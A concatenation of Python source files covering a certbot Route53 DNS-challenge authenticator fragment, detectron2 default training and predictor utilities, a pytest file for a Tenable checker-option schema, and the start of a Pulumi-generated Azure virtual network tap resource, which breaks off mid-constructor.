"""Route53 Authenticator
This authenticator solves a DNS01 challenge by uploading the answer to AWS
Route53.
"""
description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
"DNS).")
ttl = 10
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.r53 = boto3.client("route53")
self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
@classmethod
def add_parser_arguments(cls, add): # pylint: disable=arguments-differ
super(Authenticator, cls).add_parser_arguments(add)
add('base-domain', default=None, help='Base domain containing the DNS TXT records, defaults to none.')
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return "Solve a DNS01 challenge using AWS Route53"
def _setup_credentials(self):
pass
def _perform(self, domain, validation_name, validation): # pylint: disable=missing-docstring
pass
def perform(self, achalls):
self._attempt_cleanup = True
try:
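            # Note added for clarity (not in the upstream plugin): one UPSERT per challenge
            # is submitted first, then every change id is polled so that all TXT records are
            # live in Route53 before the ACME server attempts validation.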
change_ids = [
self._change_txt_record("UPSERT",
self._domain_to_update(achall.validation_domain_name(achall.domain)),
achall.validation(achall.account_key))
for achall in achalls
]
for change_id in change_ids:
self._wait_for_change(change_id)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during perform: %s', e, exc_info=True)
raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
return [achall.response(achall.account_key) for achall in achalls]
def _domain_to_update(self, domain):
if self.conf('base-domain'):
return domain + '.' + self.conf('base-domain') + '.'
return domain
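    # Illustrative sketch (assumption, not part of the upstream code): with the base-domain
    # option above set to e.g. "acme.example.net", a validation name such as
    # "_acme-challenge.www.example.com" is rewritten by _domain_to_update to
    # "_acme-challenge.www.example.com.acme.example.net.", so the TXT record lands under the
    # delegated base domain instead of the original zone.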
def _cleanup(self, domain, validation_name, validation):
try:
self._change_txt_record("DELETE", self._domain_to_update(validation_name), validation)
except (NoCredentialsError, ClientError) as e:
logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
def _find_zone_id_for_domain(self, domain):
"""Find the zone id responsible a given FQDN.
That is, the id for the zone whose name is the longest parent of the
domain.
"""
paginator = self.r53.get_paginator("list_hosted_zones")
zones = []
target_labels = domain.rstrip(".").split(".")
for page in paginator.paginate():
for zone in page["HostedZones"]:
if zone["Config"]["PrivateZone"]:
continue
candidate_labels = zone["Name"].rstrip(".").split(".")
if candidate_labels == target_labels[-len(candidate_labels):]:
zones.append((zone["Name"], zone["Id"]))
if not zones:
raise errors.PluginError(
"Unable to find a Route53 hosted zone for {0}".format(domain)
)
        # Order the zones that are suffixes of our desired domain by
        # length; this puts them in an order like:
# ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
# And then we choose the first one, which will be the most specific.
zones.sort(key=lambda z: len(z[0]), reverse=True)
return zones[0][1]
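    # Example (illustrative): for "_acme-challenge.www.example.com", public hosted zones
    # "example.com." and "com." would both match; sorting by name length in descending
    # order selects "example.com.", the most specific zone, and its Id is returned.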
def _change_txt_record(self, action, validation_domain_name, validation):
zone_id = self._find_zone_id_for_domain(validation_domain_name)
rrecords = self._resource_records[validation_domain_name]
challenge = {"Value": '"{0}"'.format(validation)}
if action == "DELETE":
# Remove the record being deleted from the list of tracked records
rrecords.remove(challenge)
if rrecords:
# Need to update instead, as we're not deleting the rrset
action = "UPSERT"
else:
# Create a new list containing the record to use with DELETE
rrecords = [challenge]
else:
rrecords.append(challenge)
response = self.r53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
"Comment": "certbot-dns-route53 certificate validation " + action,
"Changes": [
{
"Action": action,
"ResourceRecordSet": {
"Name": validation_domain_name,
"Type": "TXT",
"TTL": self.ttl,
"ResourceRecords": rrecords,
}
}
]
}
)
return response["ChangeInfo"]["Id"]
def _wait_for_change(self, change_id):
"""Wait for a change to be propagated to all Route53 DNS servers.
https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
"""
for unused_n in range(0, 120):
response = self.r53.get_change(Id=change_id)
if response["ChangeInfo"]["Status"] == "INSYNC":
return
time.sleep(5)
raise errors.PluginError(
"Timed out waiting for Route53 change. Current status: %s" %
response["ChangeInfo"]["Status"])
|
py | 7dfacec45b38859266490ae62f3e040b06ad67a3 | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
This file contains components with some default boilerplate logic users may need
in training / testing. They will not work for everyone, but many users may find them useful.
The behavior of functions/classes in this file is subject to change,
since they are meant to represent the "common default behavior" people need in their projects.
"""
import argparse
import logging
import os
import sys
import weakref
from collections import OrderedDict
from typing import Optional
import torch
from fvcore.nn.precise_bn import get_bn_modules
from omegaconf import OmegaConf
from torch.nn.parallel import DistributedDataParallel
import detectron2.data.transforms as T
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import CfgNode, LazyConfig
from detectron2.data import (
MetadataCatalog,
build_detection_test_loader,
build_detection_train_loader,
)
from detectron2.evaluation import (
DatasetEvaluator,
inference_on_dataset,
print_csv_format,
verify_results,
)
from detectron2.modeling import build_model
from detectron2.solver import build_lr_scheduler, build_optimizer
from detectron2.utils import comm
from detectron2.utils.collect_env import collect_env_info
from detectron2.utils.env import seed_all_rng
from detectron2.utils.events import CommonMetricPrinter, JSONWriter, TensorboardXWriter
from detectron2.utils.file_io import PathManager
from detectron2.utils.logger import setup_logger
from . import hooks
from .train_loop import AMPTrainer, SimpleTrainer, TrainerBase
__all__ = [
"create_ddp_model",
"default_argument_parser",
"default_setup",
"default_writers",
"DefaultPredictor",
"DefaultTrainer",
]
def create_ddp_model(model, *, fp16_compression=False, **kwargs):
"""
Create a DistributedDataParallel model if there are >1 processes.
Args:
model: a torch.nn.Module
fp16_compression: add fp16 compression hooks to the ddp object.
See more at https://pytorch.org/docs/stable/ddp_comm_hooks.html#torch.distributed.algorithms.ddp_comm_hooks.default_hooks.fp16_compress_hook
kwargs: other arguments of :module:`torch.nn.parallel.DistributedDataParallel`.
""" # noqa
if comm.get_world_size() == 1:
return model
if "device_ids" not in kwargs:
kwargs["device_ids"] = [comm.get_local_rank()]
ddp = DistributedDataParallel(model, **kwargs)
if fp16_compression:
from torch.distributed.algorithms.ddp_comm_hooks import default as comm_hooks
ddp.register_comm_hook(state=None, hook=comm_hooks.fp16_compress_hook)
return ddp
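# Illustrative usage (comment only, not part of the original file):
#   model = create_ddp_model(build_model(cfg), broadcast_buffers=False, fp16_compression=True)
# wraps the model in DistributedDataParallel only when the job runs with more than one process.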
def default_argument_parser(epilog=None):
"""
Create a parser with some common arguments used by detectron2 users.
Args:
epilog (str): epilog passed to ArgumentParser describing the usage.
Returns:
argparse.ArgumentParser:
"""
parser = argparse.ArgumentParser(
epilog=epilog
or f"""
Examples:
Run on single machine:
$ {sys.argv[0]} --num-gpus 8 --config-file cfg.yaml
Change some config options:
$ {sys.argv[0]} --config-file cfg.yaml MODEL.WEIGHTS /path/to/weight.pth SOLVER.BASE_LR 0.001
Run on multiple machines:
(machine0)$ {sys.argv[0]} --machine-rank 0 --num-machines 2 --dist-url <URL> [--other-flags]
(machine1)$ {sys.argv[0]} --machine-rank 1 --num-machines 2 --dist-url <URL> [--other-flags]
""",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--config-file", default="", metavar="FILE", help="path to config file")
parser.add_argument(
"--resume",
action="store_true",
help="Whether to attempt to resume from the checkpoint directory. "
"See documentation of `DefaultTrainer.resume_or_load()` for what it means.",
)
parser.add_argument("--eval-only", action="store_true", help="perform evaluation only")
parser.add_argument("--num-gpus", type=int, default=1, help="number of gpus *per machine*")
parser.add_argument("--num-machines", type=int, default=1, help="total number of machines")
parser.add_argument(
"--machine-rank", type=int, default=0, help="the rank of this machine (unique per machine)"
)
# PyTorch still may leave orphan processes in multi-gpu training.
# Therefore we use a deterministic way to obtain port,
# so that users are aware of orphan processes by seeing the port occupied.
port = 2 ** 15 + 2 ** 14 + hash(os.getuid() if sys.platform != "win32" else 1) % 2 ** 14
parser.add_argument(
"--dist-url",
default="tcp://127.0.0.1:{}".format(port),
help="initialization URL for pytorch distributed backend. See "
"https://pytorch.org/docs/stable/distributed.html for details.",
)
parser.add_argument(
"opts",
help="""
Modify config options at the end of the command. For Yacs configs, use
space-separated "PATH.KEY VALUE" pairs.
For python-based LazyConfig, use "path.key=value".
""".strip(),
default=None,
nargs=argparse.REMAINDER,
)
return parser
def _try_get_key(cfg, *keys, default=None):
"""
    Try to select keys from cfg until the first key that exists; otherwise return default.
"""
if isinstance(cfg, CfgNode):
cfg = OmegaConf.create(cfg.dump())
for k in keys:
# OmegaConf.select(default=) is supported only after omegaconf2.1,
# but some internal users still rely on 2.0
parts = k.split(".")
# https://github.com/omry/omegaconf/issues/674
for p in parts:
if p not in cfg:
break
cfg = OmegaConf.select(cfg, p)
else:
return cfg
return default
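# Illustrative example (not part of the original file): the same lookup works for both config
# styles, e.g. _try_get_key(cfg, "OUTPUT_DIR", "train.output_dir", default="./output") reads
# cfg.OUTPUT_DIR from a yacs CfgNode or cfg.train.output_dir from a LazyConfig/omegaconf config.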
def _highlight(code, filename):
try:
import pygments
except ImportError:
return code
from pygments.lexers import Python3Lexer, YamlLexer
from pygments.formatters import Terminal256Formatter
lexer = Python3Lexer() if filename.endswith(".py") else YamlLexer()
code = pygments.highlight(code, lexer, Terminal256Formatter(style="monokai"))
return code
def default_setup(cfg, args):
"""
Perform some basic common setups at the beginning of a job, including:
1. Set up the detectron2 logger
2. Log basic information about environment, cmdline arguments, and config
3. Backup the config to the output directory
Args:
cfg (CfgNode or omegaconf.DictConfig): the full config to be used
        args (argparse.Namespace): the command line arguments to be logged
"""
output_dir = _try_get_key(cfg, "OUTPUT_DIR", "output_dir", "train.output_dir")
if comm.is_main_process() and output_dir:
PathManager.mkdirs(output_dir)
rank = comm.get_rank()
setup_logger(output_dir, distributed_rank=rank, name="fvcore")
logger = setup_logger(output_dir, distributed_rank=rank)
logger.info("Rank of current process: {}. World size: {}".format(rank, comm.get_world_size()))
logger.info("Environment info:\n" + collect_env_info())
logger.info("Command line arguments: " + str(args))
if hasattr(args, "config_file") and args.config_file != "":
logger.info(
"Contents of args.config_file={}:\n{}".format(
args.config_file,
_highlight(PathManager.open(args.config_file, "r").read(), args.config_file),
)
)
if comm.is_main_process() and output_dir:
# Note: some of our scripts may expect the existence of
# config.yaml in output directory
path = os.path.join(output_dir, "config.yaml")
if isinstance(cfg, CfgNode):
logger.info("Running with full config:\n{}".format(_highlight(cfg.dump(), ".yaml")))
with PathManager.open(path, "w") as f:
f.write(cfg.dump())
else:
LazyConfig.save(cfg, path)
logger.info("Full config saved to {}".format(path))
# make sure each worker has a different, yet deterministic seed if specified
seed = _try_get_key(cfg, "SEED", "train.seed", default=-1)
seed_all_rng(None if seed < 0 else seed + rank)
    # cudnn benchmark has large overhead. It shouldn't be used considering the small size of
    # a typical validation set.
if not (hasattr(args, "eval_only") and args.eval_only):
torch.backends.cudnn.benchmark = _try_get_key(
cfg, "CUDNN_BENCHMARK", "train.cudnn_benchmark", default=False
)
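# Illustrative usage (assumption, not in the original file): a typical yacs-based script calls
#   cfg = get_cfg(); cfg.merge_from_file(args.config_file); cfg.merge_from_list(args.opts)
#   default_setup(cfg, args)
# right after argument parsing, before building the model or trainer.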
def default_writers(output_dir: str, max_iter: Optional[int] = None):
"""
Build a list of :class:`EventWriter` to be used.
It now consists of a :class:`CommonMetricPrinter`,
:class:`TensorboardXWriter` and :class:`JSONWriter`.
Args:
output_dir: directory to store JSON metrics and tensorboard events
max_iter: the total number of iterations
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return [
# It may not always print what you want to see, since it prints "common" metrics only.
CommonMetricPrinter(max_iter),
JSONWriter(os.path.join(output_dir, "metrics.json")),
TensorboardXWriter(output_dir),
]
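# Illustrative note (not in the original file): DefaultTrainer registers these writers via
#   hooks.PeriodicWriter(self.build_writers(), period=20)
# where build_writers defaults to this function, so metrics are printed, stored in
# metrics.json, and logged to tensorboard periodically.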
class DefaultPredictor:
"""
Create a simple end-to-end predictor with the given config that runs on
single device for a single input image.
    Compared to using the model directly, this class adds the following:
1. Load checkpoint from `cfg.MODEL.WEIGHTS`.
2. Always take BGR image as the input and apply conversion defined by `cfg.INPUT.FORMAT`.
3. Apply resizing defined by `cfg.INPUT.{MIN,MAX}_SIZE_TEST`.
4. Take one input image and produce a single output, instead of a batch.
This is meant for simple demo purposes, so it does the above steps automatically.
This is not meant for benchmarks or running complicated inference logic.
If you'd like to do anything more complicated, please refer to its source code as
examples to build and use the model manually.
Attributes:
metadata (Metadata): the metadata of the underlying dataset, obtained from
cfg.DATASETS.TEST.
Examples:
::
pred = DefaultPredictor(cfg)
inputs = cv2.imread("input.jpg")
outputs = pred(inputs)
"""
def __init__(self, cfg):
self.cfg = cfg.clone() # cfg can be modified by model
self.model = build_model(self.cfg)
self.model.eval()
if len(cfg.DATASETS.TEST):
self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
checkpointer = DetectionCheckpointer(self.model)
checkpointer.load(cfg.MODEL.WEIGHTS)
self.aug = T.ResizeShortestEdge(
[cfg.INPUT.MIN_SIZE_TEST, cfg.INPUT.MIN_SIZE_TEST], cfg.INPUT.MAX_SIZE_TEST
)
self.input_format = cfg.INPUT.FORMAT
assert self.input_format in ["RGB", "BGR"], self.input_format
def __call__(self, original_image):
"""
Args:
original_image (np.ndarray): an image of shape (H, W, C) (in BGR order).
Returns:
predictions (dict):
the output of the model for one image only.
See :doc:`/tutorials/models` for details about the format.
"""
with torch.no_grad(): # https://github.com/sphinx-doc/sphinx/issues/4258
# Apply pre-processing to image.
if self.input_format == "RGB":
# whether the model expects BGR inputs or RGB
original_image = original_image[:, :, ::-1]
height, width = original_image.shape[:2]
image = self.aug.get_transform(original_image).apply_image(original_image)
image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1))
inputs = {"image": image, "height": height, "width": width}
predictions = self.model([inputs])[0]
return predictions
class DefaultTrainer(TrainerBase):
"""
A trainer with default training logic. It does the following:
1. Create a :class:`SimpleTrainer` using model, optimizer, dataloader
defined by the given config. Create a LR scheduler defined by the config.
2. Load the last checkpoint or `cfg.MODEL.WEIGHTS`, if exists, when
`resume_or_load` is called.
3. Register a few common hooks defined by the config.
It is created to simplify the **standard model training workflow** and reduce code boilerplate
for users who only need the standard training workflow, with standard features.
It means this class makes *many assumptions* about your training logic that
    may easily become invalid in new research. In fact, any assumptions beyond those made in the
:class:`SimpleTrainer` are too much for research.
The code of this class has been annotated about restrictive assumptions it makes.
When they do not work for you, you're encouraged to:
1. Overwrite methods of this class, OR:
2. Use :class:`SimpleTrainer`, which only does minimal SGD training and
nothing else. You can then add your own hooks if needed. OR:
3. Write your own training loop similar to `tools/plain_train_net.py`.
See the :doc:`/tutorials/training` tutorials for more details.
Note that the behavior of this class, like other functions/classes in
this file, is not stable, since it is meant to represent the "common default behavior".
It is only guaranteed to work well with the standard models and training workflow in detectron2.
To obtain more stable behavior, write your own training logic with other public APIs.
Examples:
::
trainer = DefaultTrainer(cfg)
trainer.resume_or_load() # load last checkpoint or MODEL.WEIGHTS
trainer.train()
Attributes:
scheduler:
checkpointer (DetectionCheckpointer):
cfg (CfgNode):
"""
def __init__(self, cfg):
"""
Args:
cfg (CfgNode):
"""
super().__init__()
logger = logging.getLogger("detectron2")
if not logger.isEnabledFor(logging.INFO): # setup_logger is not called for d2
setup_logger()
cfg = DefaultTrainer.auto_scale_workers(cfg, comm.get_world_size())
# Assume these objects must be constructed in this order.
model = self.build_model(cfg)
optimizer = self.build_optimizer(cfg, model)
data_loader = self.build_train_loader(cfg)
model = create_ddp_model(model, broadcast_buffers=False)
self._trainer = (AMPTrainer if cfg.SOLVER.AMP.ENABLED else SimpleTrainer)(
model, data_loader, optimizer
)
self.scheduler = self.build_lr_scheduler(cfg, optimizer)
self.checkpointer = DetectionCheckpointer(
# Assume you want to save checkpoints together with logs/statistics
model,
cfg.OUTPUT_DIR,
trainer=weakref.proxy(self),
)
self.start_iter = 0
self.max_iter = cfg.SOLVER.MAX_ITER
self.cfg = cfg
self.register_hooks(self.build_hooks())
def resume_or_load(self, resume=True):
"""
If `resume==True` and `cfg.OUTPUT_DIR` contains the last checkpoint (defined by
a `last_checkpoint` file), resume from the file. Resuming means loading all
        available states (e.g. optimizer and scheduler) and updating the iteration counter
from the checkpoint. ``cfg.MODEL.WEIGHTS`` will not be used.
Otherwise, this is considered as an independent training. The method will load model
weights from the file `cfg.MODEL.WEIGHTS` (but will not load other states) and start
from iteration 0.
Args:
resume (bool): whether to do resume or not
"""
self.checkpointer.resume_or_load(self.cfg.MODEL.WEIGHTS, resume=resume)
if resume and self.checkpointer.has_checkpoint():
# The checkpoint stores the training iteration that just finished, thus we start
# at the next iteration
self.start_iter = self.iter + 1
def build_hooks(self):
"""
Build a list of default hooks, including timing, evaluation,
checkpointing, lr scheduling, precise BN, writing events.
Returns:
list[HookBase]:
"""
cfg = self.cfg.clone()
cfg.defrost()
cfg.DATALOADER.NUM_WORKERS = 0 # save some memory and time for PreciseBN
ret = [
hooks.IterationTimer(),
hooks.LRScheduler(),
hooks.PreciseBN(
# Run at the same freq as (but before) evaluation.
cfg.TEST.EVAL_PERIOD,
self.model,
# Build a new data loader to not affect training
self.build_train_loader(cfg),
cfg.TEST.PRECISE_BN.NUM_ITER,
)
if cfg.TEST.PRECISE_BN.ENABLED and get_bn_modules(self.model)
else None,
]
# Do PreciseBN before checkpointer, because it updates the model and need to
# be saved by checkpointer.
# This is not always the best: if checkpointing has a different frequency,
# some checkpoints may have more precise statistics than others.
if comm.is_main_process():
ret.append(hooks.PeriodicCheckpointer(self.checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD))
def test_and_save_results():
self._last_eval_results = self.test(self.cfg, self.model)
return self._last_eval_results
# Do evaluation after checkpointer, because then if it fails,
# we can use the saved checkpoint to debug.
ret.append(hooks.EvalHook(cfg.TEST.EVAL_PERIOD, test_and_save_results))
if comm.is_main_process():
# Here the default print/log frequency of each writer is used.
# run writers in the end, so that evaluation metrics are written
ret.append(hooks.PeriodicWriter(self.build_writers(), period=20))
return ret
def build_writers(self):
"""
Build a list of writers to be used using :func:`default_writers()`.
If you'd like a different list of writers, you can overwrite it in
your trainer.
Returns:
list[EventWriter]: a list of :class:`EventWriter` objects.
"""
return default_writers(self.cfg.OUTPUT_DIR, self.max_iter)
def train(self):
"""
Run training.
Returns:
OrderedDict of results, if evaluation is enabled. Otherwise None.
"""
super().train(self.start_iter, self.max_iter)
if len(self.cfg.TEST.EXPECTED_RESULTS) and comm.is_main_process():
assert hasattr(
self, "_last_eval_results"
), "No evaluation results obtained during training!"
verify_results(self.cfg, self._last_eval_results)
return self._last_eval_results
def run_step(self):
self._trainer.iter = self.iter
self._trainer.run_step()
@classmethod
def build_model(cls, cfg):
"""
Returns:
torch.nn.Module:
It now calls :func:`detectron2.modeling.build_model`.
Overwrite it if you'd like a different model.
"""
model = build_model(cfg)
logger = logging.getLogger(__name__)
logger.info("Model:\n{}".format(model))
return model
@classmethod
def build_optimizer(cls, cfg, model):
"""
Returns:
torch.optim.Optimizer:
It now calls :func:`detectron2.solver.build_optimizer`.
Overwrite it if you'd like a different optimizer.
"""
return build_optimizer(cfg, model)
@classmethod
def build_lr_scheduler(cls, cfg, optimizer):
"""
It now calls :func:`detectron2.solver.build_lr_scheduler`.
Overwrite it if you'd like a different scheduler.
"""
return build_lr_scheduler(cfg, optimizer)
@classmethod
def build_train_loader(cls, cfg):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_train_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_train_loader(cfg)
@classmethod
def build_test_loader(cls, cfg, dataset_name):
"""
Returns:
iterable
It now calls :func:`detectron2.data.build_detection_test_loader`.
Overwrite it if you'd like a different data loader.
"""
return build_detection_test_loader(cfg, dataset_name)
@classmethod
def build_evaluator(cls, cfg, dataset_name):
"""
Returns:
DatasetEvaluator or None
It is not implemented by default.
"""
raise NotImplementedError(
"""
If you want DefaultTrainer to automatically run evaluation,
please implement `build_evaluator()` in subclasses (see train_net.py for example).
Alternatively, you can call evaluation functions yourself (see Colab balloon tutorial for example).
"""
)
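        # Illustrative override (a sketch, not something this class provides): a subclass
        # working with a COCO-format dataset could implement it roughly as
        #
        #     @classmethod
        #     def build_evaluator(cls, cfg, dataset_name):
        #         return COCOEvaluator(dataset_name, output_dir=cfg.OUTPUT_DIR)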
@classmethod
def test(cls, cfg, model, evaluators=None):
"""
Args:
cfg (CfgNode):
model (nn.Module):
evaluators (list[DatasetEvaluator] or None): if None, will call
:meth:`build_evaluator`. Otherwise, must have the same length as
``cfg.DATASETS.TEST``.
Returns:
dict: a dict of result metrics
"""
logger = logging.getLogger(__name__)
if isinstance(evaluators, DatasetEvaluator):
evaluators = [evaluators]
if evaluators is not None:
assert len(cfg.DATASETS.TEST) == len(evaluators), "{} != {}".format(
len(cfg.DATASETS.TEST), len(evaluators)
)
results = OrderedDict()
for idx, dataset_name in enumerate(cfg.DATASETS.TEST):
data_loader = cls.build_test_loader(cfg, dataset_name)
# When evaluators are passed in as arguments,
# implicitly assume that evaluators can be created before data_loader.
if evaluators is not None:
evaluator = evaluators[idx]
else:
try:
evaluator = cls.build_evaluator(cfg, dataset_name)
except NotImplementedError:
                    logger.warning(
"No evaluator found. Use `DefaultTrainer.test(evaluators=)`, "
"or implement its `build_evaluator` method."
)
results[dataset_name] = {}
continue
results_i = inference_on_dataset(model, data_loader, evaluator)
results[dataset_name] = results_i
if comm.is_main_process():
assert isinstance(
results_i, dict
), "Evaluator must return a dict on the main process. Got {} instead.".format(
results_i
)
logger.info("Evaluation results for {} in csv format:".format(dataset_name))
print_csv_format(results_i)
if len(results) == 1:
results = list(results.values())[0]
return results
@staticmethod
def auto_scale_workers(cfg, num_workers: int):
"""
        When the config is defined for a certain number of workers (according to
``cfg.SOLVER.REFERENCE_WORLD_SIZE``) that's different from the number of
workers currently in use, returns a new cfg where the total batch size
is scaled so that the per-GPU batch size stays the same as the
original ``IMS_PER_BATCH // REFERENCE_WORLD_SIZE``.
Other config options are also scaled accordingly:
        * training steps and warmup steps are scaled inversely proportionally.
        * learning rate is scaled proportionally, following :paper:`ImageNet in 1h`.
For example, with the original config like the following:
.. code-block:: yaml
IMS_PER_BATCH: 16
BASE_LR: 0.1
REFERENCE_WORLD_SIZE: 8
MAX_ITER: 5000
STEPS: (4000,)
CHECKPOINT_PERIOD: 1000
When this config is used on 16 GPUs instead of the reference number 8,
calling this method will return a new config with:
.. code-block:: yaml
IMS_PER_BATCH: 32
BASE_LR: 0.2
REFERENCE_WORLD_SIZE: 16
MAX_ITER: 2500
STEPS: (2000,)
CHECKPOINT_PERIOD: 500
Note that both the original config and this new config can be trained on 16 GPUs.
        It's up to the user whether to enable this feature (by setting ``REFERENCE_WORLD_SIZE``).
Returns:
CfgNode: a new config. Same as original if ``cfg.SOLVER.REFERENCE_WORLD_SIZE==0``.
"""
old_world_size = cfg.SOLVER.REFERENCE_WORLD_SIZE
if old_world_size == 0 or old_world_size == num_workers:
return cfg
cfg = cfg.clone()
frozen = cfg.is_frozen()
cfg.defrost()
assert (
cfg.SOLVER.IMS_PER_BATCH % old_world_size == 0
), "Invalid REFERENCE_WORLD_SIZE in config!"
scale = num_workers / old_world_size
bs = cfg.SOLVER.IMS_PER_BATCH = int(round(cfg.SOLVER.IMS_PER_BATCH * scale))
lr = cfg.SOLVER.BASE_LR = cfg.SOLVER.BASE_LR * scale
max_iter = cfg.SOLVER.MAX_ITER = int(round(cfg.SOLVER.MAX_ITER / scale))
warmup_iter = cfg.SOLVER.WARMUP_ITERS = int(round(cfg.SOLVER.WARMUP_ITERS / scale))
cfg.SOLVER.STEPS = tuple(int(round(s / scale)) for s in cfg.SOLVER.STEPS)
cfg.TEST.EVAL_PERIOD = int(round(cfg.TEST.EVAL_PERIOD / scale))
cfg.SOLVER.CHECKPOINT_PERIOD = int(round(cfg.SOLVER.CHECKPOINT_PERIOD / scale))
cfg.SOLVER.REFERENCE_WORLD_SIZE = num_workers # maintain invariant
logger = logging.getLogger(__name__)
logger.info(
f"Auto-scaling the config to batch_size={bs}, learning_rate={lr}, "
f"max_iter={max_iter}, warmup={warmup_iter}."
)
if frozen:
cfg.freeze()
return cfg
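# Illustrative use of the scaling helper above (numbers taken from its docstring example;
# `cfg` is assumed to be a CfgNode with SOLVER.REFERENCE_WORLD_SIZE = 8):
#
#     cfg16 = DefaultTrainer.auto_scale_workers(cfg, num_workers=16)
#     # IMS_PER_BATCH 16 -> 32, BASE_LR 0.1 -> 0.2, MAX_ITER 5000 -> 2500,
#     # STEPS (4000,) -> (2000,), CHECKPOINT_PERIOD 1000 -> 500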
# Access basic attributes from the underlying trainer
for _attr in ["model", "data_loader", "optimizer"]:
setattr(
DefaultTrainer,
_attr,
property(
# getter
lambda self, x=_attr: getattr(self._trainer, x),
# setter
lambda self, value, x=_attr: setattr(self._trainer, x, value),
),
)
|
py | 7dfacf0c62f0477e0377a60996ece1e90ef2270c | '''tests for checker option schemas'''
import pytest
from marshmallow.exceptions import ValidationError
from tenable.ad.checker_option.schema import CheckerOptionSchema
@pytest.fixture
def checker_option_schema():
return [{
"id": 0,
"codename": "string",
"profileId": 0,
"checkerId": 0,
"directoryId": 0,
"value": "string",
"valueType": "string",
"name": "string",
"description": "string",
"staged": True,
"translations": ['string']
}]
def test_checker_option_schema(checker_option_schema):
test_response = [{
"id": 0,
"codename": "string",
"profileId": 0,
"checkerId": 0,
"directoryId": 0,
"value": "string",
"valueType": "string",
"name": "string",
"description": "string",
"staged": True
}]
schema = CheckerOptionSchema()
assert test_response[0]['name'] == schema.dump(schema.load(
checker_option_schema[0]))['name']
with pytest.raises(ValidationError):
checker_option_schema[0]['new_val'] = 1
schema.load(checker_option_schema[0])
|
py | 7dfad0015e3c523298ab28aae946646e2064e4fd | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkTap']
class VirtualNetworkTap(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Virtual Network Tap resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['destination_load_balancer_front_end_ip_configuration'] = destination_load_balancer_front_end_ip_configuration
__props__['destination_network_interface_ip_configuration'] = destination_network_interface_ip_configuration
__props__['destination_port'] = destination_port
__props__['id'] = id
__props__['location'] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['tap_name'] = tap_name
__props__['etag'] = None
__props__['name'] = None
__props__['network_interface_tap_configurations'] = None
__props__['provisioning_state'] = None
__props__['resource_guid'] = None
__props__['type'] = None
